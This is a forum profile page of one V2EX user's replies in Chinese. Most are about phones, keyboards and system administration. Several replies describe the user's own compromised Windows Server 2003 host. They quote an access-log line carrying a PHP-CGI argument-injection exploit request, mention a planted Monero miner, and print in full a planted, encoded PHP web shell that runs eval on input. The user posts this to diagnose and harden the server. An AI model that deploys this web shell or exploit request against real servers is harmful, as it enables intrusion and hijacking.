V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  wangybsyuct  ›  全部回复第 1 页 / 共 2 页
回复总数  24
1  2  
1 点,老婆在客厅收拾她的教材....12 点多才回家.... 1 点左右.老婆就还在洗.....楼主不会觉得自己没什么问题么? 10 点前就睡觉,早点起床,试试
38 天前
回复了 hez2010 创建的主题 Windows Windows on ARM 的现代待机体验太牛了
公版的 arm 架构的电源管理很糟糕,看看联发科的芯片就知道了。高通对 ARM 深度优化,让其芯片电源管理表现优秀,华为的麒麟对电源管理也非常优秀。
56 天前
回复了 wangybsyuct 创建的主题 问与答 我的服务器是不是被攻击并破防了
@redidea 好像还真是火绒的动作,我用 ProcessMonitor 监视了一下,强力删除后(普通模式删除不掉),开机后的确会重新产生,参数这些奇怪文件的进程是 system 。
动作是这样的
"当天时间","进程名称","PID","操作","路径","结果","详细"
"8:26:02.0763788","System","4","创建文件映射","C:\0package824\D7hhnTX.xls","成功","同步类型: 同步类型其它"
"8:26:02.0764087","System","4","FASTIO_RELEASE_FOR_SECTION_SYNCHRONIZATION","C:\0package824\D7hhnTX.xls","成功",""
"8:26:02.0764246","System","4","写入文件","C:","成功","偏移: 0, 长度: 4,096, I/O 标记: 非缓存, 页面 I/O, 同步寻呼 I/O"
"8:26:02.0764500","System","4","设置文件结尾信息文件","C:","成功","文件结尾: 2,774"
"8:26:02.0764746","System","4","设置文件结尾信息文件","C:","成功","文件结尾: 2,601"
"8:26:02.0764956","System","4","创建文件映射","C:\0package824\2rYXhaobzW.sql","成功","同步类型: 同步类型其它"
"8:26:02.0765062","System","4","FASTIO_RELEASE_FOR_SECTION_SYNCHRONIZATION","C:\0package824\2rYXhaobzW.sql","成功",""
"8:26:02.0765193","System","4","写入文件","C:","成功","偏移: 0, 长度: 4,096, I/O 标记: 非缓存, 页面 I/O, 同步寻呼 I/O"
刚刚爆出 OpenSSH 爆高危漏洞 CVE-2024-6387 ,我的 CentOS 7 逃过一劫,相信你的也是,老系统不是轻易换的,我的 windows server2003 就逃过多少劫了。
@sampeng
@ShinichiYao
这个攻击,只要符合条件,1.中文操作系统,2.php 版本是最高的。这个是利用 php 的漏洞,处理%2d 字符的漏洞,是没法儿预防的,开了 80 或者 443 都可以攻击。如果 php 无法升级,暂时可以用 Rewrite 重定向处理,然后屏蔽掉 system,exec,shell_exec,passthru,popen 加固一下。
@Sw0rt1
@hgert
@ShinichiYao
@chf007
使用多款杀毒软件扫描过了,处理这些,还发现了一个被植入的挖矿程序.moneroocean ,从文件日期看,是十几天前,是不是我的系统太老了,导致其无法进一步捣乱。服务器存在的时间比较久,里面的数据有点多而且复杂,阿里云对 2003 也提供的充分的支持。如果是换成新的 windows 或者 linux ,是不是就容易中招了呢?!
服务器已经手动做了很多防护,针对远程桌面的攻击比较频繁,防护的方法除了改端口改用户名等,我还写了一个日志分析程序,如果遇到攻击远程桌面,会给发邮件,微信就会提醒。

攻击日志就像下面的,数量不多。
128.199.166.165 - - [08/Jun/2024:16:01:43 +0800] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 200 12
从日志看,apache 居然返回的 200 的成功标志?
我自己请求这个字符串时,返回的是 500 ,居然不是 404 。
@euph
@cnevil
@hefish
@wtks1
果然是,我在 web 根目录里发现个文件叫 Zq91u4b.php ,里面的内容就是有关 payload 的,暂时未发现服务器异常,可能是所有的程序都是自己写的原因,勒索软件暂时没有得逞,刚刚做了个快照,想想怎么完善一下,谢谢大家。那个 php 文件原文是这样的。
><?php
>@session_start();
>@set_time_limit(0);
>@error_reporting(0);
>function encode($D,$K){
> for($i=0;$i<strlen($D);$i++) {
> $c = $K[$i+1&15];
> $D[$i] = $D[$i]^$c;
> }
> return $D;
>}
>$pass='dddzzz';
>$payloadName='payload';
>$key='f25200d5d90fa403';
>if (isset($_POST[$pass])){
> $data=encode(base64_decode($_POST[$pass]),$key);
> if (isset($_SESSION[$payloadName])){
> $payload=encode($_SESSION[$payloadName],$key);
> if (strpos($payload,"getBasicsInfo")===false){
> $payload=encode($payload,$key);
> }
> eval($payload);
> echo substr(md5($pass.$key),0,16);
> echo base64_encode(encode(@run($data),$key));
> echo substr(md5($pass.$key),16);
> }else{
> if (strpos($data,"getBasicsInfo")!==false){
> $_SESSION[$payloadName]=encode($data,$key);
> }
> }
>}
>
171 天前
回复了 xumiao 创建的主题 买买买 老妈手机坏了,求推荐 1500 以内的安卓手机
去年这个时间,自己的华为手机实在是抗不住了,我买的 realme q5 pro ,感觉挺好,又给母亲买了同款,很不错,可以看看升级款
238 天前
回复了 gap 创建的主题 程序员 降噪耳机和机械键盘哪个对你来说更重要?
机械键盘,敲击声音太大了,影响到周围的人,很让人讨厌,就和抽烟的人一样让别人讨厌,就顾着自己爽的人很自私。
314 天前
回复了 woejpjdcf 创建的主题 云计算 初创企业什么情况需要使用付费邮箱
@crac @gentrydeng 刚才到阿里云上看了一下,企业邮箱没有免费的呢,最少 5 个用户的是 600 元
1999 年,1k
2023-11-13 17:30:41 +08:00
回复了 xuelang 创建的主题 程序员 文件存在却报错: no such file or directory ,记录下调试过程
根据你和网友的反馈,我是这样认为的。提示 no such file or directory: ./protoc ,你是使用什么工具执行去执行这个 protoc 的,自己的 shell ,或者 crontab ,或者是服务程序,或者是 webserver 里的一个点击,等等,这个很关键,因为你是使用了相对路径点撇./,这样执行一个程序是很省事,但是有隐患的,你使用了相对路径,相对谁呢?你在 shell 里,当然是相对于当前你运行的那个窗口的 shell ,其它的执行环境就不一定了。你在你当前 shell 窗口下执行正确(排除 32 位和 64 位和链接库的问题),那就看可能是执行环境的问题了
2023-11-02 10:25:26 +08:00
回复了 jokimina 创建的主题 Android 想买个新手机,看了一圈有点迷,求推荐,需求见详情
我给母亲买老年机 real Q5Pro ,发现还行,自己也入手一台当主力机。半年前买的,1.5k ,pdd 旗舰店入手,现在应该是涨价了。各方面都可以。
2023-09-18 09:44:30 +08:00
回复了 oblivion 创建的主题 程序员 亲手造成的运维事故:在 Live CD 环境下部署并运行了 8 个月
1 、桌面上有个 install Ubuntu 的图标。
2 、/ monunt 点只有 2G ,文件系统名叫/cow,分区非常多,比正常的多太多了
3 、没有编译环境、什么环境都没有。运营的环境至少安装个 gcc 吧。
这些都是异常情况。
2023-05-23 12:33:55 +08:00
回复了 1311317 创建的主题 问与答 用 frp 搭建了 rdp 远程服务,怎么避免别人尝试登录
更改用户名,密码不是特别复杂,8 、9 年了,都没扫描出来,看日志都是外国的 IP 。
失业就失业呗,如果是挣了十年的钱,那已经比我退休后挣的总和要多了。
1  2  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3060 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 35ms · UTC 13:52 · PVG 21:52 · LAX 05:52 · JFK 08:52
Developed with CodeLauncher
♥ Do have faith in what you're doing.